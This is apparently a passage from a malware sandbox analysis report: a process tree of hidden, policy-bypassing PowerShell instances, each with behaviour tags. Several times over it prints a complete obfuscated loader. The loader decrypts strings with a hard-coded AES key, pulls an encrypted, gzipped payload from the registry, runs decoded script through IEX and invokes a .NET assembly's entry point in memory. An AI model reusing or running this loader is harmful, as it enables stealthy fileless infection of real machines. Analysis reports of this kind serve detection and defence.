System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1096
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1352).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5300
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1352).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious use of SetWindowsHookEx
        
        PID:6048
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6048).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        9⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious use of SetThreadContext
        
        PID:6696
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6048).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = 